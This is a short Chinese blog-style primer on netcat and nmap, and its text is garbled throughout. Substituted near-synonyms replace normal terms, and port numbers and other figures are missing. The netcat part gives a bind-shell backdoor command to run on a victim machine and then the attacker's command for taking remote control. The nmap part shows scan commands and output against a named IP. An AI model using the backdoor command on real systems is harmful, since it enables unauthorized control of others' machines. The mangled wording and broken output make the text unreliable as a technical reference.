這三款東西是網絡安詳利器,做一個簡樸摘要,以備參考。
netcat--網安瑞士軍刀
netcat可以用于監控/掃描網絡端口,它應用最多的環境是后門措施。
一般分兩個步調:
步調一: 我們在被進攻的呆板上用下列呼吁:nc –v –l –p 端標語 –e shell //
個中端標語是我們欲將shell綁定到哪個端口,shell在差異的系統是差異,在Windows下是cmd.exe,在Linux下一般是/bin/sh。
步調二: 進攻者在本身的呆板上利用呼吁 :nc 被進攻者IP 端標語來到達長途節制受害者(被進攻者)的呆板。
下面的例子是將windows下的cmd.exe綁定在80端口,
然后在Linux呆板長舉辦節制
可以看到,我們在Linux下完全獲得了Windows下一樣的cmd.exe,并且我們可以完全像在當地節制一樣長途完全節制Windows。
__________________________________________
nmap: 成果強大的端口掃描東西
簡樸來講,nmap有以下幾種主要用法
全面掃描:nmap-T4 -A targetip
主機發明:nmap-T4 -sn targetip
端口掃描:nmap-T4 targetip
處事掃描:nmap-T4 -sV targetip
操縱系統掃描:nmap-T4 -O targetip
下面給出幾個例子,如默認掃描一臺主機的開放端口
C:Usersaa>nmap 101.41.11.45
Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:13 中國尺度時間
Nmap scan report for 101.41.11.45
Host is up (.00061s latency).
Not shown: closed ports
PORT STATE SERVICE
/tcp open netbios-ssn
/tcp open https
/tcp open apex-mesh
/tcp open mysql
/tcp open ms-term-serv
MAC Address: ::D1:8A:: (Micro-star International CO.)
Nmap done: IP address ( host up) scanned in 1.49 seconds
端口有如下四種狀態:
Open port(防火墻答允少數端口打開)
Closed Port(由于防火墻的緣故,大部門的端口被封鎖)
Filtered(Nmap不確定端口是否打開可能封鎖)
Unfiltered(Nmap可以或許會見這個端口,可是不清楚這個端口打開的狀態)
假如用-A選項,會有越發具體的信息,所有開放端口、對應的處事、操縱系統信息會盡收眼底。。。
C:Usersaa>nmap -A 101.41.11.45
Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-23 14:16 中國尺度時間
Nmap scan report for 101.41.11.45
Host is up (.00011s latency).
Not shown: closed ports
PORT STATE SERVICE VERSION
/tcp open netbios-ssn
/tcp open ssl/http Apache httpd
|_http-title: VisualSVN Server
|_http-favicon:
/tcp open vmware-auth VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
/tcp open mysql MySQL 5.5.
| mysql-info: Protocol:
| Version: 5.5.
| Thread ID:
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactio
ns, Secure Connection
| Status: Autocommit
|_Salt: w{'M-:xq
/tcp open ms-term-serv?
MAC Address: ::D1:8A:: (Micro-star International CO.)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows XP
Network Distance: hop
Host script results:
|_nbstat: NetBIOS name: XXXXXXX, NetBIOS user: <unknown>, NetBIOS MAC:
::d3:8a:: (Micro-star International CO.)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows LAN Manager)
| Name: WORKGROUPXXXXXXX
|_ System time: -- :: UTC+
TRACEROUTE
HOP RTT ADDRESS
0.10 ms 101.41.11.45
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: IP address ( host up) scanned in 111.66 seconds